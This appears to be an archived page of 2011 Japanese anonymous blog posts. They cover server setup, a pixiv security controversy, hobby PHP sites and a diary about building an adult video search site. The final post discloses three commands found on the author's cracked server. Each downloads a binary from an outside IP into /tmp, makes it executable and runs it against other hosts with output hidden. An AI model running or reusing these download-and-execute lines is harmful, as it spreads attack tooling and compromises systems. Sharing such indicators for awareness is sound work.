freebsd-update fetch/install:OK
portsnap fetch/extract:OK
NTP
- ntp.nict .jp
- ntp1.v6.mfeed.ad .jp
- ntp2.v6.mfeed.ad .jp
- ntp3.v6.mfeed.ad .jp
perl
- pkg_add -r perl:OK
CPAN
- 普通じゃだめなのでCPAN.pm CPAN::URLを "ftp://ftp.ring.gr.jp/pub/CPAN/"にすると
- perl -MCPAN -e shellでいろいろinstallできる
ports
- fetchするURLのIPv6 対応による

Apps
- SSH:OK
- Apache:OK
- Squid:OK

SSHで入ってsquidでgoogle,youtubeなどipv6 対応のサイトならこれで全く問題ない

Permalink | トラックバック(0) | 16:17

2011-09-18

■テラ インターナショナル社代表北畠徹也さんに関する公開記録集

2009年 Tetsuya Kitahataのメーリングリストの投稿権などをすべて剥奪することを決定したApache ソフトウェア財団の議事録

http://www.apache.org/foundation/records/minutes/2009/board_minutes_2009_11_18.txt

2010年 twitter.co.jp ドメインを取得し、twitter 本家にドメインの移転を申し立てられた事件の紛争処理記録

http://www.nic.ad.jp/ja/drp/list/2010/JP2010-0001.html

2011年 perlの商標登録を取得し、perl 本家に意義を申し立てられた事件の審決記録

http://www1.ipdl.inpit.go.jp/JJ0/htmldata/H/2/2/_/9/0/0/1/422900199_001.html

Permalink | トラックバック(0) | 14:04

2011-09-15

■世界中の「ありがとう」を集めるサービスを作ってみた

THANKFUL WORLD - 世界を「ありがとう」でつなげよう -

似たようなサービスは既にあると思いますが、PHP プログラムの練習課題として作成してみました。

投稿者から「ありがとう」にまつわる話を投稿してもらい、感謝の気持ちを伝えるサービスです。

サービスを作った目的

ソーシャルサービスと連動させる
HTML5+CSS3を利用する
何でもいいので最後までやり遂げる

この中で一番の目的だったのは3番目の最後までやり遂げるだったりします。

本当にどんなものでもよかったので、最後まで作り上げて公開するのを目標にやってきました。

システム 環境

Apache+PHP+MySQLのオーソドックスなもの。

Web サーバの構築課題も含めてなので、さくらのVPSを一台契約しました。

インストールから設定まで行って初めて分かることも多くありました。

開発期間

1週間

思いついてから公開までの時間です。

やって良かったこと

Web サーバについての知識が深まった
システムを構築するに当たっての手順や手法などを改めて考えさせられた
次に向けての課題点が見つかったこと

次に自分が覚えることが見えたのは大きいです。

今できることを高めることも重要ですが、自分に足りないものを吸収してより良い形で昇華することも必要。

反省すべき点

思いつきで行動したため、行き当たりばったりで思っていたものとは異なる形となった
最初の設計に時間をかけるべき

設計が全てだと思います。

個人でサービスを作る以上、自分自身がクライアントなので途中で行う仕様変更（改善や思いつきによる変更など）に対する文句のぶつけ場所もありません。

念入りに設計を行い、それに基づいて開発を行う。

当たり前のことですが当たり前に行うのが難しいです。

何事も初めが肝心です。

最後に

ひと通り開発を行ってみて、自分の知識や能力についてもある程度把握できたように思えます。

今できることもわかったので、次は今できないことをできるように知識を深め、

今できることと合わせて新たな段階に進めればと思います。

長々とお読み頂きありがとうございました。

Permalink | トラックバック(0) | 00:28

2011-08-29

■『ヤフー知恵袋 API』で『ヤフーバカ袋』を作った

背景

みんなも知っての通り、前々から 2chなどでヤフー知恵袋が『Yahoo!バカ袋』『Yahoo!知恵遅れ』とネタにされています。

たとえば

Q : 健康ランドのお風呂場で、オナニーした人いますか？

A : 申し訳ありません・・・ついつい気持よくなって・・・

http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1252778297

Q : 食パンマンの顔は何枚切りなんですか？

A : 何枚切りだろうが、彼は二枚目です

http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1315883

こんな質問するのは一体何者なんでしょうか。

おもしろいので、こういう質問を集めるサイトを作ってみました。

どんなサイト?

知恵袋のURLをコピペで登録するだけのシンプルなサイトです。

http://y-kichigai.info/

サイトの名前は『ヤホーおバカ袋』となっていますが、最初は『Yahoo!キチガイ袋』でした。流石にヤフーさんに怒られるかなと思って控えめにしましたwww

ドメインはキチガイのままですがw

当面は2chに挙がった質問をのっけていこうと思っています。

ぜひみんなもおもしろい質問をのっけていってください^^

では技術面も書きます(ｷﾘｯ

技術的なこと

Yahoo知恵袋 APIはOAuthを使って書き込みなども出来ますが、今回は記事の内容を取得するだけだったので楽でした。

ひとまずAPIを叩いてXMLを見て、あとは配列にして...と簡単にとれました。

環境はApache+PHP+MySQLを使っています。よくあるあれです。

jqueryも使っています。jquery プラグインはすごく豊富でajaxを使ったフォームもtwitter風のメッセージバーも超簡単に設置できました。

あと、cssはyahooのcssﾌﾚｰﾑﾜｰｸを使っています。yahoo css gridsが便利で、http://developer.yahoo.com/yui/grids/builder/　これを使えば土台が簡単にできました。。

デザインはアイコン載っけりゃいい感じに見えるので、http://photoshopvip.net/ からテキトウに見つけます。

さいごに

読んでくれてありがとうございました^^!

せっかく作ったので、誰かに教えたくて。。。

ぜひ使って、おもしろい質問を共有しましょう^^

要望あればぜひぜひください。

Permalink | トラックバック(4) | 22:36

2011-08-10

■http://anond.hatelabo.jp/20110810170332

もし悪意のある人が侵入していたら、全ユーザーのクレジットカード情報を盗んだり

クレジット決済には外部の決済サービス使ってたんでしょ？それでもクレカ情報全部pixivが保持してたとか、さすがにちょっといくらなんでもないと思う。

pixivにウイルスを仕込んだりできます。

へ？管理画面とやらで何ができるかもわからないのに、それ言い切っちゃうの？

いや、絶対できないとは言わないよ。管理画面でJavaScript設置とかないとは言い切れないし。

短時間で数年間のログを調べることができたのだろうか？

ログが残ってりゃ可能だろうね。

このようなジョークを仕込めるほどの人

apacheのデフォルト index.htmlを書き換えるだけの簡単なお仕事です。どれほどヘボな管理者でもやるつもりなら簡単にできます。

ちょっと気の利いた管理者なら、apacheのデフォルト index.htmlを見せないようにするでしょうけど、そこまでではなかっただけかもしれませんね。

Permalink | トラックバック(0) | 18:06

2011-08-09

■pixiv セキュリティ騒動についてまとめておく

togetterがchromeが固まるくらい重いのと、書いてある内容に同意できてもエタ東となる4時の組み合わせは気分が悪いので、自分用に。

最初に書いておくと、これは特に pixiv擁護ではない。というより、擁護できる部分は特にない。

前提知識

pixivを擁護したがっている人たちというのがいて、連日出てくる問題を鎮火させようと頑張っている。

カオスラウンジとズブズブだったpixivも悪の企業であると認めず、pixivは悪くない、pixivは俺たちの居場所だ、と信じて自分たちの立場を守ろうとする。（俺正義タイプ）

本の宣伝をしたいが代替サービスのユーザーがまだ少ない。pixivを宣伝用に使い続けるしかないのから pixivを守りたい。（我欲タイプ）

カオスラウンジ大好き！pixivも大好き！（信仰タイプ）

pixivとかユーザーのことなんて全くどうでもいいけど、批判に対して反対意見を言える俺かっこいい。（自己顕示タイプ）

大体想像できる動機はこんなところ。

メンツは固定しているないが、毎度の騒動で発生源となっているtogetterまとめを網羅的に眺めると、誰が鎮火しようとしているのか分かりやすい。

はてブでいうとb:id:sa_tie、b:id:katsura_1、b:id:tailtame辺りが該当。彼らを駆り立てているものは一体何なのか。（なお、エタ東も方向性が違うだけで同類にカテゴライズしている）

もっとも動機が不純だからといって、成すことが正しければ良い結果をもたらすこともあるし、独善が「悪事」としか呼べない暴走を引き起こすこともある。評価は人による。

ID 漏洩騒動

pixivの新規登録画面は極めてシンプルで、pixiv idの用途については特に記されていない。（※要改善）

登録するとユーザーにはユニークな数字のidが付与されるので、pixiv idはログイン用のみだと考えている人は少なからずいるようだ。

実際にはpixiv id名でディレクトリが作られるほか、スタックフィード（活動履歴）のid、アカウントを共用するpixiv ブログや、姉妹サイト drawr（flashで手書きできるサイト）のidとして利用されている。

pixiv idを外部から見られないものとして、個人名を使うなどする人もいて、問題となったことは過去に数度ある。id変更の機能追加をするという話もあったが今のところは実現していない。

今回の騒動の発端となったのはこのpixiv idが画像の絶対パスから参照可能だ、という最初期から判明していたことを何度運営に要望を出しても改善されないまま放置されたことに業を煮やしたことユーザー達のtwitter である。

これを、「最初期から判明していたことだから今更問題ではない」と擁護する連中が現れた。

ID パス ロック騒動

「idは最初期から漏洩するような仕様で、スタックフィードなどから idを参照することも可能だ」と判っても問題点を把握できないユーザーが多数いたことで、危機の周知は次段階に移る。

「IDとパスワードを同じにしている人は危ない。プレミアムユーザーならクレジット番号などの登録もしているので危ない。」と危険を訴えた。この辺りから「ただの言いがかりレベル」などと鎮火ツイートが広がる。

現在のPC スペックの技術の向上は目覚しく、家庭用でもハイスペックなPCがあれば簡単なパスワードであれば数分～数十分で破ることもできるとされる。

が、それはメモリ内で高速に試行できるローカル環境上の話であって、web上のパスワード認証に対して必要とする時間は全く別物という視点が抜け落ちていて、とても現実的ではない。

だが、総当たりなどせずとも、簡単な単語やIDと同じパスワード、誕生日などであれば簡単にログインできてしまう可能性がある。

それを、「例えローカル上で10万回/秒でログイン試行できるPCでも、web上のパスワード認証に対しては通信とサーバーレスポンスがボトルネックとなって100回/秒程度のパフォーマンスしか発揮できないと思う。並列で大量にリクエストを殺到させればサーバーが落ちるだけだし、そもそも膨大なオーダーのログイン攻撃が仕掛けられれば、突破するより前にファイヤーウォールが異常を関知するか、サーバー管理者が気付く。そもそもイラストコミュニティサイトに対して逮捕されるリスクを犯して潜入したところで、成りすまして暴言コメントを書いたり個人情報を抜く程度で、不正アクセスのリスクにリターンが見合っていないわけで…。」

などと問題点をすり替えて、指摘する側がさも間違っているかのように発言を繰り返す。

大手ポータルサイトや銀行、携帯キャリア、有料ポイントを運用するネトゲなどであればそれなりに堅牢なログイン構造にするのが当然で、既に大手のお絵描きコミュニティ、しかもカードの支払まで行われるサイトにパスロックがないというのが問題でないはずがない。

httpsでログインできないことも当然問題である。

admin騒動

admin.pixiv .net他に接続するとグローバルIP からでもログイン認証が出てくるというもの。発覚したのは実は1年も前だという。今回twitter等で公になってからも1時間程度は誰もがアクセス可能であった。

あくまでログイン認証画面が出てくるだけで、ID/パスワードが判明したわけでもなく、webのログイン認証に対するブルートフォースは非現実的なのは変わらないが、「外部からadminツールにログイン可能」というセキュリティ意識の無さが露呈し、大騒ぎとなる。

更に話が広まる際には「adminツールが流出した」「バックドアが仕掛けられた」「ログインにキーロガーが仕掛けられている」「アクセスするとウイルスを仕込まれる可能性がある」「今すぐ退会せよ」など虚実入り乱れた話となる。

普通に考えれば、外部からアクセス可能な状態で晒され続けたという事態が発覚した時点でサーバーを落として対策を取るはずなのだが、隠蔽体質に定評のあるpixivが何のアクションも起こさない為、念のためアクセスを控えるよう呼びかける。

「そこまで大事になっているのであればサーバーを落とすわけで、実害はない」などと見当違いな「俺の脳内のpixivのセキュリティ安全神話」ツイートが擁護派から出てくる。

It workssl!騒動

admin.ads.pixiv.orgに接続すると「It workssl!」と表示されるもの。これがapacheのデフォルト表示「It works!」と異なることから、「何者かに書き換えられたか、運営が謎のミスをしたのか」と疑惑が生まれる。

ads.pixiv.orgは広告関連のサーバーのようだが、侵入された場合は他のサーバーも同様に危険である可能性が高く、「個人情報やカード情報が抜かれる危険性もある」と指摘されると「万が一侵入されていても個人情報が流出する可能性は低い」と根拠のないpixivの言い訳を持ち出す。

カード情報は決済代行会社が保存していると運営から「なぜか」一部ユーザーにメールで通知されていたようで、ここまでの騒ぎになっておきながらサイトトップでも発表しないなど、さらに不信感が募る。

まとめ

「IDが漏洩する危険性がある」という問題点から、罪のないユーザーが被害に遭うことを防ごうしたものの、サービス開始時からの仕様で改善される望みが薄い。

さらに管理者ページが外部から閲覧できたことは、あってはならないセキュリティ意識、にもかかわらず、「批判は的外れで間違いだらけ」というまさに的外れな擁護ツイートが広まる。

ここまでサンドバックになってて何も発言せずパスロックを実装するpixivはある意味凄いが、その沈黙がさらなる疑惑を生んでいることにいつ気が付くのか。

Permalink | トラックバック(2) | 19:35

■pixiv セキュリティ騒動についてまとめておく

togetterがchromeが固まるくらい重いのと、書いてある内容に同意できてもエタ東となる4時の組み合わせは負けた気分になるので、自分用に。

最初に書いておくと、これはpixiv擁護ではない。というより、擁護できる部分は特にない。

前提知識

pixivを潰したがっている人たちというのがいて、連日火をつけようと頑張っている。

カオスラウンジとズブズブだったpixivも悪の企業で、騙されているユーザーのためにも俺たち正義の味方が粛清しなければならない。（俺正義タイプ）
本の宣伝をしたいが代替サービスのユーザーがまだ少ない。pixivを宣伝用に使い続けるしかないのが歯痒いからpixivを潰したい。（我欲タイプ）
かつては普通のpixiv ユーザーだったが運営への不信が募り、また何らかのしがらみがあり、反転した愛着から今は憎悪しかない。（呪縛霊タイプ）
pixivとかユーザーのことなんて全くどうでもいいけど、大手サイトを潰すお祭りによって得られる全能感が心地よい。（便乗タイプ）

大体想像できる動機はこんなところ。

ほぼメンツは固定しているので、毎度の騒動で発生源となっているtogetterまとめを網羅的に眺めると、誰が火をつけようとしているのか分かりやすい。

ID 漏洩騒動

pixivの新規登録画面は極めてシンプルで、pixiv idの用途については特に記されていない。（※要改善）

登録するとユーザーにはユニークな数字のidが付与されるので、pixiv idはログイン用のみだと考えている人は少なからずいるようだ。

今回の騒動の発端となったのはこのpixiv idが画像の絶対パスから参照可能だ、という最初期から判明していたことをid 漏洩だと騒ぎ立てたことから始まる。

パス ロック騒動

「idは漏洩したわけではなく、最初期からこのような仕様で、スタックフィードなどから idを参照することは可能だ」と判明したことで、祭りは次段階に移る。

「パスワード総当り攻撃に対する対処がない、悪意あるユーザーがブルートフォース攻撃を仕掛ければ突破されてしまう」と騒ぎ立てた。この辺りからただの言いがかりレベル。

確かに現在のPC スペックの技術の向上は目覚しく、家庭用でもハイスペックなPCがあれば簡単なパスワードであれば数分～数十分で破ることもできるとされる。

が、それはメモリ内で高速に試行できるローカル環境上の話であって、web上のパスワード認証に対して必要とする時間は全く別物という視点が抜け落ちていて、とても現実的ではない。

例えローカル上で10万回/秒でログイン試行できるPCでも、web上のパスワード認証に対しては通信とサーバーレスポンスがボトルネックとなって100回/秒程度のパフォーマンスしか発揮できないと思う。

並列で大量にリクエストを殺到させればサーバーが落ちるだけだし、そもそも膨大なオーダーのログイン攻撃が仕掛けられれば、突破するより前にファイヤーウォールが異常を関知するか、サーバー管理者が気付く。

そもそもイラストコミュニティサイトに対して逮捕されるリスクを犯して潜入したところで、成りすまして暴言コメントを書いたり個人情報を抜く程度で、不正アクセスのリスクにリターンが見合っていないわけで…。

大手ポータルサイトや銀行、携帯キャリア、有料ポイントを運用するネトゲなどであればそれなりに堅牢なログイン構造にすると思うけど、お絵描きコミュニティにパスロックがないというのが即叩き材料になるとは思えないが。

もちろんパスロック自体はないよりはあった方が安心できるのは間違いない。~~でもセキュリティ専門の人ならまずhttpsでログインできないことを指摘するよね。~~

admin騒動

admin.pixiv .net他に接続するとグローバルIP からでもログイン認証が出てくるというもの。発覚してから1時間程度はアクセスが可能だった。

あくまでログイン認証画面が出てくるだけで、ID/パスワードが判明したわけでもなく、webのログイン認証に対するブルートフォースは非現実的なのは変わらないが、「クラックされた」「ロジックボムが爆発する」など大騒ぎする。

更に尾ひれが付いて「adminツールが流出した」「バックドアが仕掛けられた」「ログインにキーロガーが仕掛けられている」「アクセスするとウイルスを仕込まれる可能性がある」「今すぐ退会せよ」など騒がれる。

普通に考えれば、そこまで大事になっているのであればサーバーを落とすわけで、実害はないのだろうな、と思うわけだけど「既にハッカーに乗っ取られていて、運営は手も出せないのでは」とまで言い出す人まで。

アイマス2に男キャラが追加されたのをきっかけに「可能性を生み出しただけでアウトなんだよ！」とネガキャンしまくっていた人たちを思い出す。

「セキュリティ問題とギャルゲーを同一視するのは間違いだ」という指摘は正しいけれど、ハッカー映画に影響された「俺の脳内のセキュリティ問題」なんてゲームの世界と大差ない。

It workssl!騒動

admin.ads.pixiv.orgに接続すると「It workssl!」と表示されるもの。これがapacheのデフォルト表示「It works!」と異なることから、「ハッカーに書き換えられた、侵入の痕跡だ」と大騒ぎする。

ads.pixiv.orgは広告関連のサーバーのようで、万が一侵入されていても個人情報が流出する可能性は低いのだけど、「個人情報がマニアに売られている」「カード情報も抜かれている」と騒がれる。

実際にはカード情報は決済代行会社が保存しているようで、アカウントに不正アクセスで潜入しても見られるのはカード末尾4桁のみ。

まとめ

「IDが漏洩した」という新たな材料で騒ごうとしたものの、実は既出の仕様だったためにパスワード総当りの「可能性」によるセキュリティ問題に切り替える。

そこから管理者ページが外部から閲覧できたことを、管理者権限が奪われた「可能性」があると話を大きくし、どうも全体の根拠が怪しいと分かると「何も言わないpixivは不誠実だ」と批判する。

ここまでサンドバックになってて何も発言せずパスロックを実装するpixivはある意味凄いが、それが付け入る隙をネチネチと探すネットの暇人クレーマーたちの加虐心をくすぐって余計な火種を生んでいることにいつ気が付くのか。

追記：セキュリティ関連については悪意を持ったユーザーに狙われる可能性があることから、表に告知を出さないというのがpixivのポリシーらしく、直接メールで問い合わせれば返事は受け取れるそうです。

不安な方はデマかもしれない情報を無責任に広める前に、直接運営に問い合わせましょう。もちろんパスワードを変えるなど自衛も重要です。

Permalink | トラックバック(6) | 17:30

■http://anond.hatelabo.jp/20110809000604

マネージャーでマネージメントできてそのスキル歓迎されるだろうけど、それしかできないならそりゃ転職は大変だろうなぁ。そもそもapachじゃなくてapacheだ。頭の問題っていうかやったことの量の問題な気がする。

Permalink | トラックバック(0) | 00:33

2011-08-04

■独学のプログラムでエロ 動画 検索を作ってみた！

【お知らせ】2011/09/07

新しいエロ WEBサービス作りました。

http://d.hatena.ne.jp/uniqueweb/20110906/1315285545

プログラムは全く得意じゃないけれど最近よく見かけるようになったエロ動画検索を自分でも作ってみたくて頑張ってみました。

近年、インターネットの普及によりエロ動画が自宅で簡単に見れるという素晴らしい時代になりました。

自分が若い頃はインターネットなんてものはなくエロビデオが主流でドキドキしながらレンタルビデオ屋に行き、可愛い女の子がレジにいない隙を見計らってお兄さんにパッケージを伏せて空箱を渡しビデオを借りたものでした。

お兄さんにビデオの空箱を渡そうとした時に可愛い子がレジに戻ってきて焦って渡すのをやめてものすごく変な動きをしながらエロビコーナーに引き返していくなんてことも多々ありましたｗ

僕のお気に入りといえば「白石ひとみ」や「あいだもも」といった女優でよく借りてました。エロビを借りるということがものすごく恥ずかしい時代？年頃？でカモフラージュに普通のビデオと一緒に借りるということもしていました。それはそれは大変な思いでオナニーしてたんです！

しかも、ビデオデッキ自体が貴重な時代でリビングに一台しかないのが当たり前でした。

深夜家族が寝静まってからヘッドフォンとビデオを抱えリビングに行き暗がりの中でヘッドフォンをテレビに差し込んでビデオの再生ボタンを期待に胸をふくらませながら押したものです。いいシーンを何回も見るためにビデオを巻き戻すんですが、ビデオを巻き戻すガチャンガチャンという機械音で家族が起きてこないか？とかそれはそれはドキドキしながら見てました。一仕事終えたあとヘッドフォンを外したらジャックが外れていて大音量で喘ぎ声が響き渡っていたなんてこともありました。誰も起きてこなかったのは優しさなんでしょうか？ｗ

さて、大分前置きが長くなりましたがエロというものはものすごい技術発展させるものだと思います。エロのおかげで日本でビデオは普及しエロのおかげで日本でインターネットはものすごく普及したと言っていいと思います。自分もエロを通して技術の発展に貢献し自分自身のスキルアップになれば。という高い志を持ってこのサイトを制作しました。決して自らのオナニーライフの充実と性癖を充たすため作ったわけではありません・・・ｗ

※2011.08.07 利用中のサーバーに障害が発生しているようで現在サーバーに接続できない状態となっています・・・

※2011.08.07 23:53 復帰した模様です。

サイト名：ヌキネーター

サイト名の由来は抜きネタからきています。抜きネーター、ヌキネーターという感じですｗ

エロサイトの制作工程を日記にしてみたんで良かったら読んで下さい。そしてこのサイトを使って夜いろいろと励んでくれたら嬉しいです。

では制作日記を書いていきたいと思います。

サーバー選び

まず前提条件としてお金をほとんどかけたくない。アダルトサイトであるということから

サーバー選びからはいりました。

月の予算は5000円以内で考えていたのでけっこう探すのが大変でした。

日本でアダルトサイトを許可している所はかなり限られていてさらにやりたいことができるのは

専用サーバーかVPS しかないのでそうなると専用サーバーは予算オーバーなので

VPSで探すことになり検索しまくってはじめに見つけたVPSはKAGOYAのVPSだったのですがβ版で募集を締め切っていて泣く泣く諦めました。

KAGOYAはかなり評判がいいみたいなので使ってみたかった。

次に見つけたのが○○○VPS。海外サーバーで日本語サポートがあり転送量の制限なしディスク容量100G

月1300円程度で借りれるということで初期設定費用に5000円程度かかりましたが借りてみました。

結果、ここは最悪でした。

通信が頻繁に切れる
激重
借りて一ヶ月もしないうちにサービスの継続が困難になりそうなのでIPが変わるとかメールがくる
あまりに通信環境が悪すぎるとメールすると環境調査に協力してくれとメールがくる
時間をかけて沢山の項目を調べて返信するも全く返答がない。

あまりの酷さに1ヶ月で解約。

よく調べてみたら評判がものすごく悪い某VPSの再販らしいです。

お金と時間をドブに捨てました・・・

もう失敗したくないと思い今度は比較的有名な海外サーバー LINODE。

日本語サポートはないけれど抜群のサポートです。

iptablesの設定でどうしてもうまくいかなくて拙い英語でメールしてみたら

10分しないうちに返信がきました！

メールに書かれているとおりにコマンドを入力したらあっさり解決。

素晴らしい！はじめから LINODEにすればよかった。

担当のブライアンはなぜか分からないけどとてもフレンドリーで親切に感じましたｗ

サーバー設定

LINODEは複数のディストリビューションから好きなものを選択できるので

とりあえず、64bit版を選択。

サーバー設定はほんとに面倒ですね。

一番面倒だけど重要だということで

Tripwire

その他各種監視ツールの導入をしました。

ほんとに面倒でした。

データベース

はじめはmysqlにストレージエンジンgroongaを使おうと思ったのですが

初めに借りた最悪なVPSはOSが32bit版だったのでgroongaがのソースが見つからずなぜかと思っていたら

どこかで見つけた記事で32bit版ではgroongaの性能を発揮しきれないということで32bit版の提供をやめてしまったらしいと書いてたので

じゃあ、sennaにするかということで最悪VPSでsennaをインストール。

その後LINODEに変更したのでOSに64bit版を選択し念願のgroongaをインストール。

しかし、調べてみると

マルチセクション機能に対応していない（複数カラム一発で無駄なく全文検索したい）
boolean modeの挙動が若干おかしい

などが理由で、結局sennaに戻して2度手間に・・・

プログラムもそれに合わせてその都度書き換えたので2度手間どころか3度手間4度手間でした・・・

senna導入はrpmでさくっといけるので簡単ですが

依存関係で少しはまりました。

まず

# rpm -qa | grep -i mysql

でmysqlがインストールされてたら削除

perl-DBIが必要なのでインストール

# yum install perl-DBI

そして下記の順番でインストール

rpm -ivh mecab-0.98-tritonn.1.0.12a.x86_64.rpm

rpm -ivh mecab-ipadic-2.7.0.20070801-tritonn.1.0.12a.x86_64.rpm

rpm -ivh senna-1.1.4-tritonn.1.0.12a.x86_64.rpm

rpm -ivh MySQL-shared-5.0.87-tritonn.1.0.12a.x86_64.rpm

rpm -ivh MySQL-client-5.0.87-tritonn.1.0.12a.x86_64.rpm

rpm -ivh MySQL-server-5.0.87-tritonn.1.0.12a.x86_64.rpm

rpm -ivh MySQL-devel-5.0.87-tritonn.1.0.12a.x86_64.rpm

my.cnfの設定をして終了

で肝心の全文検索ですがデータ件数が5万件程度で少ないせいなのか、あいまい検索と比べてそれほど速さを実感できなかったです・・・

でもきっとすごく速くなったはず！

ちなみに「麻美ゆまおっぱい」で検索した場合、0.01 secで結果が返ってきました。

動画 データの作成

さて、動画データの作成ですがいくつかのエロサイト等制作記事でもあるようにスクレイピングということをします。

スクレイピングとはWEBサイトから特定の情報だけを取得することでネット上にあるサイトをクロールして必要なデータだけを拾ってデータを作るといった感じでしょうか。

スクレイピングのプログラム自体は以前にTidy 関数を使って為替データを10分おきに取得するような物を作ったことがあったのでそれほど時間はかからないかなと思ったのですがけっこう時間かかりました。

スクレイピングにはTidyとhtml SQL、それにPHP Simple HTML DOM Parserを使いました。

下記のサイトを参考にしました。

phpによるスクレイピング処理入門

SQL みたいな文法で HTML を抽出する PHP のライブラリ

htmlSQLよりアツい!?jQueryみたいにセレクタでHTMLをparse(解析)する「PHP Simple HTML DOM Parser」

３つの中で抜群に使えるのはPHP Simple HTML DOM Parserだったんですが

ループ処理させるとメモリがすごいことになって今回のようなスクレイピングに向いてないみたいで

結局、html SQLとTidyの両方を使ってスクレイピングしました。

両方ともPHP Simple HTML DOM Parserに比べるとうまくデータの取得ができないことが多く残念な感じなんですが他に選択肢がないので・・・

使える順に並べると

PHP Simple HTML DOM Parser

html SQL

Tidy

といった感じかもしれません。

おおまかにデータを取得して正規表現で特定データを抜き出しました。

広告との連携

広告にはDMM アフィリエイトを利用しています。

http://affiliate.dmm.com/link.html

利用可能な物はパッケージ画像、サンプル画像（縮小）と書かれていたのでそれに従い画像を利用。

注記に※ユーザーレビューは引用いただけません。とだけ書かれているのでそれ以外は引用ありと判断して説明文とタイトルなどを利用

女優データとジャンルデータ、DVD データ、を紐付けたデータベースを作成し検索ワードに応じて検索結果に関連する商品を表示させるようにしました。

現状、売り上げ0で意味があるのか分かりませんけどｗ

負荷対策とか転送量とかDOS攻撃対策とか

エロサイトということで多少はチューニングとか設定とかしないとまずいかもと思い色々調べて設定しました。

やったこと

iptablesで攻撃してきそうな国からのアクセスを遮断
mod_evasiveの導入で一定時間での連続的なアクセスを遮断
httpd.confの設定 KeepAlive等

KeepAlive On

MaxKeepAliveRequests 60

KeepAliveTimeout 3

&lt;IfModule prefork.c>
StartServers       7
MinSpareServers    5
MaxSpareServers   10
ServerLimit       30
MaxClients        30
MaxRequestsPerChild  4000
&lt;/IfModule>

mod_expiresでキャッシュ設定

様子見ということで2日間で設定してみました。

mysql クエリーキャッシュの設定

query_cache_limit=1M

query_cache_min_res_unit=4k

query_cache_size=16M

query_cache_type=1

APCの導入

とりあえずこんなところを設定してみましたが、爆発的なアクセスがあるわけでもないので有効なのか今のところ分かりません(-_-;)

Apache Benchでテストはしてみましたけど問題はない感じですが実際にチューニングができているか分かりません。

サイト デザイン

プログラマーとして有名なゆうすけさんのサイトとgoogleを参考にしました。

シンプルで使いやすいようにしようと思いこのデザインにしました。

3カラムの中央可変となっています。

クロスブラウザはIE7、firefox3、chromeで行いました。

可変ものって作ったことなかったんですがけっこう面倒なんですね。

サイト 機能

ブックマーク機能とメニューの折りたたみ機能、検索結果の表示方法切替を作りました。

まず、ブックマーク機能ですがログインなしで気に入った動画をブックマークできるようにしました。

ブックマークに追加した動画はブックマークページで確認できるようにしました。

cookie 機能を利用したらいけると思い色々調べてjquery.cookie.jsを利用。

保存したクッキー情報を呼び出してphpに渡して処理し指定要素にブックマーク一覧をloadメソッドで表示させるという感じです。

$(function(){
$("#youso").load("xxx.php");
});

メニューの折りたたみ機能は人気AV女優やAV女優別、人気タグなどをそのまま表示させるとずらっと長くなって邪魔だったのでつけました。

これには同じくjquery.cookie.jsを利用しました。

参考サイト：http://blog.caraldo.net/2009/03/newjqqookiemenu.php

検索結果の表示方法切替にはZoomer Galleryを利用しました。

参考URL：http://phpjavascriptroom.com/?t=ajax&p=jquery_plugin_zoom#a_zoomergallery

検索結果ページで表示される

[ここの画像]

××× の検索結果

44件中 1～10件目を表示

ここの画像の部分をクリックするとgoogle イメージ検索みたいに一覧でイメージ表示できるようにしてみました。

動画表示ページ

基本的に動画の埋め込みを許可しているサイトのみプレイヤー表示をしそれ以外は画像を表示し動画データへリンクするようにしました。

埋め込み部分はあらかじめそれぞれのサイトに対応したプレーヤー部分のコードを記述しVIDEOIDの部分に置き換えるような形にしました。

XVIDEOSを例にすると

XVIDEOSの場合かならず動画のurlがhttp://www.xvideos.com/videoXXXXXX/のようになりますのでXXXXXXの部分を

VIDEOID部分に置き換えるようにプログラムを組みました、

埋め込み部のソース

>||<object width="510" height="400" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" ><param name="quality" value="high" /><param name="bgcolor" value="#000000" /><param name="allowScriptAccess" value="always" /><param name="movie" value="http://static.xvideos.com/swf/flv_player_site_v4.swf" /><param name="allowFullScreen" value="true" /><param name="flashvars" value="id_video=VIDEOID" /><embed src="http://static.xvideos.com/swf/flv_player_site_v4.swf" allowscriptaccess="always" width="510" height="400" menu="false" quality="high" bgcolor="#000000" allowfullscreen="true" flashvars="id_video=VIDEOID" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /></object>
||<

その他の動画サイトもURLの一部分のデータを使っているので同様の処理をしました。

まとめ

実際の作業は２、３週間ですが色々調べる時間が多くて制作に2ヶ月くらいかかりました。

自分でエロ動画検索を作ってみて有名プログラマーさん達がいかに優秀なのか思い知らされました。

皆さん思いついて数日で作ってしまうのでびっくりです。

全くWEBの知識がない人で４、５ヶ月ですごいの作っちゃう人とかもいるみたいですし世の中広いな～と思います。

しかし、エロサイト作りで勉強になりますね～

大分、色んな知識を得ることができました。

これからプラグラムを勉強しようと思う人はぜひエロサイトから入ってみて下さい。

きっと楽しいですよ！

そんなこんなで？頑張って作ってみたエロ動画検索、良かったら使ってみて下さい。

これで少しは技術の発展に役立てたでしょうか？ｗ

アダルト動画検索ヌキネーター

P.S エロサイトを作っていてはじめは楽しくて興奮しながら作ってたのですが最後の方はエロい物を見ても全く反応しなくなりましたｗ

　　不能ではないんですけど・・・今現在も性欲が著しく減退しております・・・

　　そしてスーパーpre 記法がうまういかないのはなぜ？はてな匿名ダイアリー初投稿で全然分からない・・・

　　そしてそしてプログラマーさんとかデザイナーさんとかエロい人とかお気軽にお声をおかけ下さい。

【お知らせ】2011/09/07

新しいエロ WEBサービス作りました。

http://d.hatena.ne.jp/uniqueweb/20110906/1315285545

Permalink | トラックバック(5) | 02:13

2011-07-29

■クラッキングされたサーバで実行されていた怪しいコマンドを晒す

うちの大したことに使ってもいないのに常時稼動で外部公開なサーバがクラックされて以下のコマンドが実行されていた。

sh -c cd /tmp;wget ttp://195.69.220.2/dd_ssh;chmod 755 dd_ssh;./dd_ssh 50 217.79.190.53 2 &gt;/dev/null 2&gt;/dev/null
sh -c cd /tmp;wget ttp://195.69.220.2/slowdssh;chmod 755 slowdssh;./slowdssh  &gt;/dev/null 2&gt;/dev/null
sh -c cd /tmp;killall -9 ssh2;wget ttp://195.69.220.2/ssh3;chmod 755 ssh3;./ssh3 200 72.20.14.174 &gt;/dev/null 2&gt;/dev/null

((正式なリンクだと502エラーが出て書き込めないのでhを抜いてあります。))

